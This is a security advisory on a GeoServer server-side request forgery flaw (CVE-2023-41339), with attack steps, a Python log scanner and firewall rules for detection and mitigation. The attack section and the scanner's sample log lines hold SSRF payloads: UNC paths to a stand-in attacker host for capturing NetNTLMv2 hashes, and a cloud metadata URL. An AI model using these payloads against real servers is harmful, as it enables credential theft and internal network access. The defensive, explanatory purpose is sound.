CVE-2023-41339 Overview
CVE-2023-41339 is a Server-Side Request Forgery (SSRF) vulnerability in GeoServer, an open source software server written in Java that allows users to share and edit geospatial data. The vulnerability exists in the WMS (Web Map Service) specification implementation, which defines an sld=<url> parameter for GetMap, GetLegendGraphic, and GetFeatureInfo operations. When dynamic styling is enabled without proper URL validation checks, attackers can exploit this functionality to perform SSRF attacks.
Critical Impact
This vulnerability can be exploited to steal user NetNTLMv2 hashes, which could subsequently be relayed or cracked externally to gain unauthorized access to systems and networks.
Affected Products
- OSGeo GeoServer 2.22.x releases prior to 2.22.5
- OSGeo GeoServer 2.23.x releases prior to 2.23.2
Discovery Timeline
- 2023-10-25 - CVE-2023-41339 published to NVD
- 2024-11-21 - Last updated in NVD database
Technical Details for CVE-2023-41339
Vulnerability Analysis
This Server-Side Request Forgery vulnerability stems from GeoServer's implementation of the WMS specification's dynamic styling feature. The sld=<url> parameter allows users to supply custom Styled Layer Descriptor (SLD) files via URL for GetMap, GetLegendGraphic, and GetFeatureInfo operations. Without proper URL validation and checks in place, this feature can be abused to make the server initiate requests to arbitrary URLs controlled by an attacker.
The vulnerability is particularly dangerous in Windows environments, where attackers can craft requests to SMB shares, causing GeoServer to authenticate using the service account's NetNTLMv2 credentials. These captured hashes can then be used in relay attacks against other systems or subjected to offline cracking attempts.
Root Cause
The root cause of this vulnerability is the lack of URL validation checks when processing user-supplied SLD URLs. The GeoServer implementation accepts and fetches resources from arbitrary URLs without verifying whether the target is an internal or sensitive endpoint. This missing validation, classified as CWE-918 (Server-Side Request Forgery), allows attackers to abuse the server as a proxy for making requests to internal resources or external malicious servers.
Attack Vector
The attack is network-based and requires no authentication or user interaction. An attacker can exploit this vulnerability by:
- Identifying a vulnerable GeoServer instance with dynamic styling enabled
- Crafting a malicious WMS request (GetMap, GetLegendGraphic, or GetFeatureInfo) with the sld parameter pointing to an attacker-controlled URL
- When targeting Windows systems, using a UNC path (e.g., \\attacker.com\share) to capture NetNTLMv2 hashes
- Relaying or cracking the captured credentials to gain further access to the network
The vulnerability can also be used to scan internal networks, access internal services, or exfiltrate data through DNS or HTTP channels.
Detection Methods for CVE-2023-41339
Indicators of Compromise
- Unusual outbound HTTP/HTTPS requests from GeoServer to external or internal IP addresses
- WMS requests containing sld= parameters with suspicious URLs, particularly those pointing to internal networks or UNC paths
- SMB authentication attempts originating from the GeoServer host to external systems
- Unexpected DNS queries from the GeoServer for unfamiliar domains
Detection Strategies
- Monitor and log all WMS requests containing the sld parameter for anomalous URL patterns
- Implement network-level monitoring for outbound connections from GeoServer to unexpected destinations
- Review web server access logs for GetMap, GetLegendGraphic, and GetFeatureInfo requests with external URL references
- Deploy intrusion detection rules to identify SSRF attack patterns in WMS requests
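The log review described above, as an added example that is not part of the original advisory or of GeoServer itself: it parses constructed access-log lines in combined log format, extracts the sld parameter from WMS requests (case-insensitively, since WMS parameter names are not case-sensitive), and flags values that use a UNC path or non-HTTP scheme, point at a private, loopback or link-local address, or name a host outside an assumed allow-list (styles.example.org is an assumption).

```python
import re
import ipaddress
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format); not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [25/Oct/2023:10:00:01 +0000] "GET /geoserver/wms?service=WMS&request=GetMap&layers=topp:states&sld=https%3A%2F%2Fstyles.example.org%2Fstates.sld HTTP/1.1" 200 5120
203.0.113.9 - - [25/Oct/2023:10:00:02 +0000] "GET /geoserver/wms?service=WMS&request=GetLegendGraphic&layer=topp:states&SLD=http%3A%2F%2F169.254.169.254%2Flatest%2Fmeta-data%2F HTTP/1.1" 200 312
203.0.113.9 - - [25/Oct/2023:10:00:03 +0000] "GET /geoserver/wms?service=WMS&request=GetFeatureInfo&sld=file%3A%2F%2F%2F%5C%5Cattacker.example%5Cshare%5Cx.sld HTTP/1.1" 500 0
10.0.0.7 - - [25/Oct/2023:10:00:04 +0000] "GET /geoserver/wms?service=WMS&request=GetCapabilities HTTP/1.1" 200 9000
"""
# Assumption: the only host GeoServer should ever fetch remote SLD files from.
ALLOWED_SLD_HOSTS = {"styles.example.org"}

LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def classify_sld_url(url):
    """Return why a percent-decoded sld value looks like SSRF, or None if acceptable."""
    if url.startswith("\\\\"):
        return "UNC path"
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return f"non-HTTP scheme '{parts.scheme}'"
    host = (parts.hostname or "").lower()
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        ip = None  # a DNS name rather than a literal address
    if ip is not None and (ip.is_private or ip.is_loopback or ip.is_link_local):
        return f"internal address {host}"
    if host not in ALLOWED_SLD_HOSTS:
        return f"host '{host}' not in allow-list"
    return None


def scan_access_log(text):
    """Flag WMS requests whose sld parameter points somewhere GeoServer should not fetch from."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.search(line)
        if not m:
            continue
        # WMS parameter names are case-insensitive, so normalise keys before lookup.
        query = {k.lower(): v for k, v in parse_qs(urlsplit(m.group("target")).query).items()}
        for sld in query.get("sld", []):  # parse_qs has already percent-decoded the value
            reason = classify_sld_url(sld)
            if reason:
                findings.append({"client": line.split()[0], "request": query.get("request", [""])[0], "sld": sld, "reason": reason})
    return findings
```

Run scan_access_log over the sample and the two requests from 203.0.113.9 are reported; the GetMap request to the allowed style host and the GetCapabilities request without an sld parameter are not.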
Monitoring Recommendations
- Enable detailed logging for all GeoServer WMS operations
- Configure alerts for outbound SMB traffic (port 445) from web application servers
- Monitor for NetNTLMv2 authentication events that may indicate credential theft attempts
- Implement egress filtering to restrict outbound connections from the GeoServer to known, approved destinations
How to Mitigate CVE-2023-41339
Immediate Actions Required
- Upgrade GeoServer to version 2.22.5 or 2.23.2 (or a later release) immediately
- If immediate patching is not possible, disable the dynamic styling feature until the update can be applied
- Configure URL checks to restrict which external resources can be fetched by the SLD parameter
- Review GeoServer logs for any evidence of exploitation attempts
Patch Information
This vulnerability has been patched in GeoServer versions 2.22.5 and 2.23.2. Organizations should upgrade to these versions or later to remediate the vulnerability. Patches are available through the official GeoServer GitHub releases.
For detailed information about this vulnerability and the fix, refer to the GitHub Security Advisory GHSA-cqpc-x2c6-2gmf.
Workarounds
- Disable dynamic styling by removing or restricting the sld parameter functionality in GeoServer configuration
- Implement network-level controls to block outbound connections from the GeoServer to untrusted destinations
- Configure a web application firewall (WAF) to filter requests containing suspicious sld parameter values
- Use egress filtering to prevent the GeoServer from initiating connections to internal networks or external SMB shares
# Example: Block outbound SMB traffic from the GeoServer service account using iptables
# (assumes GeoServer runs as the local user "geoserver"; SMB uses TCP 445 and the
#  legacy NetBIOS session service uses TCP 139, so both are dropped here)
iptables -A OUTPUT -p tcp --dport 445 -m owner --uid-owner geoserver -j DROP
iptables -A OUTPUT -p tcp --dport 139 -m owner --uid-owner geoserver -j DROP
iptables -A OUTPUT -p udp --dport 445 -m owner --uid-owner geoserver -j DROP
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.